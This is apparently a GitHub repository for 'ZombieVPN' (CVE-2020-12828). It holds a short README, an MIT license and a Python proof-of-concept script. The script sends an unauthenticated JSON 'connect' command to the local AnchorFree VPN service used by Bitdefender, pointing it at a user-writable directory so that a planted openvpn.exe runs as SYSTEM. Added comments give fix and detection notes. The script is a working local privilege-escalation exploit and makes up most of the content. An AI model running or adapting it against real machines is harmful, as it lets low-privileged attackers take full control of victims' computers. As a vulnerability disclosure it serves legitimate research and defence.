├── ZombieVPN.pdf ├── ZombieVPN.png ├── CVE-2020-12828.mp4 ├── README.md ├── LICENSE └── CVE-2020-12828.py /ZombieVPN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xsha/ZombieVPN/HEAD/ZombieVPN.pdf -------------------------------------------------------------------------------- /ZombieVPN.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xsha/ZombieVPN/HEAD/ZombieVPN.png -------------------------------------------------------------------------------- /CVE-2020-12828.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xsha/ZombieVPN/HEAD/CVE-2020-12828.mp4 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZombieVPN 2 | 3 | This repo contains everything you need to know about CVE-2020-12828 4 | 5 | ![ZombieVPN](./ZombieVPN.png "ZombieVPN") 6 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 0xsha 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/CVE-2020-12828.py:
--------------------------------------------------------------------------------
# Thu Jan 2020
# Basic PoC for ZombieVPN (CVE-2020-12828): anchorFree VPN SDK SYSTEM level code execution
# Tested on Bitdefender total security 2020 (1.2.13.81)
# Tested on Windows 7/10 x64 x86

# me [at] 0xsha.io

# What the script shows: it opens a TCP connection to a listener on loopback,
# writes one JSON "connect" message and reads a single reply. The script does
# no handshake or login before sending the command, and the directory the VPN
# binary is started from ("vpnExecutablePath") is a field of the message
# itself. According to the author's comments the listener is vpnservice.exe
# and it starts openvpn.exe from that directory under the SYSTEM account.
#
# Defender notes (inferred from the above; confirm against the vendor advisory):
# - fix direction: the service should authenticate local callers and start its
#   VPN binary only from its own protected install directory, never from a
#   path supplied in the request;
# - detection: process-creation telemetry where vpnservice.exe is the parent
#   of an openvpn.exe whose image path lies outside the product's install
#   directory (for example under a user profile).


# NOTE(review): base64 and json are not used by the live code below; base64
# appears only in a commented-out line.
import socket
import base64
import json


# Loopback address: as written, the script talks to a service on the same host.
HOST = '127.0.0.1'
PORT = 52217 # vpnservice.exe port (remotely guessable)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5-second timeout, set before connect() so it bounds the connect, send and
# recv calls made on this socket.
s.settimeout(5)
s.connect((HOST, PORT))


# this will run openvpn.exe (your payload) with SYSTEM account

# Raw string literal, so the backslashes in the Windows path are kept as
# written; the text is encoded to UTF-8 bytes for sendall().
# "vpnExecutablePath" points at a directory in a low-privileged user's
# profile, i.e. a location that user can write to.
# NOTE(review): the meaning of "authFilename", "ip", "protocol" and the empty
# "port" is not explained anywhere on this page.
payload = r'''{"command" : "connect",
"vpnExecutablePath" : "C:\Users\LowPriv",
"protocol" : "udp",
"ip" : "1.2.3.4",
"port" : "",
"authFilename" : "c21f7755f3b1f134148ab607dbbcea17.txt",
"enableLog" : false}'''.encode(encoding='utf-8')



print ('CVE-2020-12828 - Anchorfree SYSTEM level code execution')
print ('By 0xSha')
print ('Exploiting ...')

s.sendall(payload)
#print(base64.b64decode(payload))
# A single recv() of at most 1024 bytes; a longer or fragmented reply is not
# reassembled.
data = s.recv(1024)
s.close()
# NOTE(review): this only tests whether the substring 'isSuccess' occurs in
# the repr of the reply bytes; the value attached to that key is never
# inspected, so the message below is printed whenever the key is present.
if 'isSuccess' in repr(data):
    print ("Your payload executed as SYSTEM !")
else:
    print (":( Nope ")

--------------------------------------------------------------------------------